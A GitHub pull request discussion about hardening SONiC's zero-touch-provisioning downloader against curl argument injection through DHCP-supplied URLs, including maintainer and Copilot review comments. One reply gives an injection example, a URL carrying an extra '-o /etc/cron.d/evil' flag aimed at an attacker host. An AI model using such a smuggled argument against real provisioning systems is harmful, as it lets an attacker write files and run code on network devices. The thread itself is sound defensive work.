ztp: harden curl command construction in Downloader and DHCP hook

[xq9mend]

Why I did it

The ZTP downloader constructed curl commands by string concatenation,
allowing content derived from DHCP options to influence how curl
interpreted its arguments.

How I did it

Replaced string concatenation with list-based argv construction in
Downloader.py. Each argument is now a discrete list element.
shlex.split() is used for the freeform curl-arguments field.
-- is appended before the URL.
Shell variable quoting hardened in dhcp/ztp.
Whitespace guard added in ztp-engine.py.

How to verify

Unit tests covering the fix are included in
tests/test_Downloader_input_validation.py (9 tests):

cd src/sonic-ztp
PYTHONPATH=src/usr/lib/python3/dist-packages \
  python3 -m pytest tests/test_Downloader_input_validation.py -v

CI (CodeQL, Semgrep) will run on PR open.

[mssonicbld]

/azp run

[azure-pipelines]

Azure Pipelines successfully started running 1 pipeline(s).

[xq9mend]

@rajendra-dendukuri @saiarcot895 @maipbui — would appreciate your review on this. @rajendra-dendukuri you wrote the original Downloader.py so you know this code best. The fix addresses argument injection via DHCP-sourced fields.

[mssonicbld]

/azp run

[azure-pipelines]

Azure Pipelines successfully started running 1 pipeline(s).

[saiarcot895]

Why should spaces be blocked?

[xq9mend]

URLs containing literal spaces are invalid per RFC 3986 — legitimate URLs use percent-encoding (%20) instead. A space in a DHCP-sourced URL string is therefore either malformed or an injection attempt.

Concretely, if a space were passed through, it could split into multiple arguments when processed, potentially injecting curl flags (e.g. http://attacker.com/ -o /etc/cron.d/evil). The primary injection fix is the list-based argv in Downloader.py, but this whitespace guard provides an early defense-in-depth layer that rejects clearly invalid input before it reaches the downloader.

[saiarcot895]

Is this actually a CVE?

[xq9mend]

No CVE assigned. This is a proactive hardening improvement to prevent argument injection via DHCP-sourced fields.

[mssonicbld]

/azp run

[azure-pipelines]

Azure Pipelines successfully started running 1 pipeline(s).

[mssonicbld]

/azp run

[azure-pipelines]

Azure Pipelines successfully started running 1 pipeline(s).

[mssonicbld]

/azp run

[azure-pipelines]

Azure Pipelines successfully started running 1 pipeline(s).

[Copilot]

Pull request overview

Hardens ZTP’s download path against curl argument injection by ensuring DHCP-/profile-derived values can’t be reinterpreted as additional curl flags, improving security of provisioning downloads.

Changes:

• Switch Downloader.getUrl() from string-concatenated curl commands to argv-list construction (with -- before the URL) and split curl-arguments via shlex.split().
• Harden DHCP hook variable quoting when persisting DHCP option values to files.
• Add a whitespace guard when reading URL strings in ztp-engine.py, plus new unit tests targeting command construction behavior.

Reviewed changes

Copilot reviewed 5 out of 5 changed files in this pull request and generated 8 comments.

Show a summary per file

File	Description
src/usr/lib/python3/dist-packages/ztp/Downloader.py	Builds curl command as a list argv and inserts -- before the URL to prevent flag injection.
src/usr/lib/ztp/dhcp/ztp	Quotes DHCP-provided variables when writing discovered URLs/values to state files.
src/usr/lib/ztp/ztp-engine.py	Rejects URLs containing whitespace when read from URL files prior to download.
tests/test_Downloader_input_validation.py	Adds tests that assert URL/dst_file/curl_args don’t become unintended curl argv tokens.
tests/conftest.py	Adds a test bootstrap that rewrites SONiC-specific default paths to temp locations.

[Copilot]

shlex.split(curl_args) can raise ValueError on malformed quoting. Because the command is now passed to runCommand() as a list, this exception will propagate and can crash ZTP (previously runCommand() caught split errors when it received a string). Consider catching ValueError here and returning an error code / logging, or using a safer parsing strategy for invalid curl_args.

Suggested change

	cmd += shlex.split(curl_args)
	try:
	cmd += shlex.split(curl_args)
	except ValueError as e:
	logger.error("!Invalid curl_args '%s': %s" % (curl_args, str(e)))
	return (20, None)

[xq9mend]

Fixed — wrapped in try/except ValueError with error logging.

[Copilot]

This conftest claims tests can run on a bare host, but it does not prevent import-time execution of external SONiC binaries (e.g., decode-syseeprom via ztp.DecodeSysEeprom.sysEeprom). On systems without those binaries, importing ztp.Downloader can fail before tests run. Consider stubbing/mocking those external command calls early in conftest (before any ztp.* imports that trigger them), or otherwise ensuring the binaries are available for the test environment.

[Copilot]

The module docstring says no real curl/network is required, but constructing Downloader() imports and instantiates ztp.DecodeSysEeprom.sysEeprom at import time, which can execute decode-syseeprom on the host. If that binary is missing, these tests can fail even though runCommand is mocked. Consider mocking/stubbing sysEeprom (or the underlying runCommand used by DecodeSysEeprom) before importing Downloader.

Suggested change

	import pytest
	from unittest.mock import patch, MagicMock
	from ztp.Downloader import Downloader
	# ---------------------------------------------------------------------------
	# Helper
	# ---------------------------------------------------------------------------
	def _make_downloader(**kwargs):
	"""Return a Downloader with safe defaults for unit testing."""
	return Downloader(
	import importlib
	import pytest
	from unittest.mock import patch, MagicMock
	# ---------------------------------------------------------------------------
	# Helper
	# ---------------------------------------------------------------------------
	def _get_downloader_class():
	"""
	Import Downloader only after stubbing sysEeprom so unit tests do not
	execute decode-syseeprom on the host at import time.
	"""
	import ztp.DecodeSysEeprom
	fake_sys_eeprom = MagicMock()
	fake_sys_eeprom.getSystemEEPROM.return_value = {}
	with patch.object(
	ztp.DecodeSysEeprom,
	'sysEeprom',
	return_value=fake_sys_eeprom,
	):
	downloader_module = importlib.import_module('ztp.Downloader')
	return downloader_module.Downloader
	def _make_downloader(**kwargs):
	"""Return a Downloader with safe defaults for unit testing."""
	downloader_cls = _get_downloader_class()
	return downloader_cls(

[Copilot]

Using echo with DHCP-supplied values can be unsafe/ambiguous when the value begins with -n or contains backslash escape sequences (echo behavior varies). For robust writing of untrusted strings, prefer printf '%s\n' "$new_bootfile_name" (and likewise for other DHCP option values).

[xq9mend]

Fixed — all 6 DHCP-supplied values now use printf '%s\n' instead of echo.

[Copilot]

Same echo caveat as above: for untrusted DHCP-provided URLs, prefer printf '%s\n' "$new_dhcp6_boot_file_url" to avoid option/escape interpretation differences across implementations.

[Copilot]

Same echo caveat as above: prefer printf over echo when writing untrusted DHCP option values like provisioning script URLs, to avoid -n/escape interpretation issues.

[Copilot]

Same echo caveat as above: prefer printf over echo when writing untrusted DHCPv6 option values like provisioning script URLs, to avoid -n/escape interpretation issues.

[Copilot]

Same echo caveat as above: prefer printf over echo when writing untrusted DHCP option values (e.g., minigraph / ACL URLs) so the content is written verbatim regardless of leading - or backslashes.

[saiarcot895]

Use example.com here.

[xq9mend]

Fixed in the latest commit.

[mssonicbld]

/azp run

[azure-pipelines]

Azure Pipelines successfully started running 1 pipeline(s).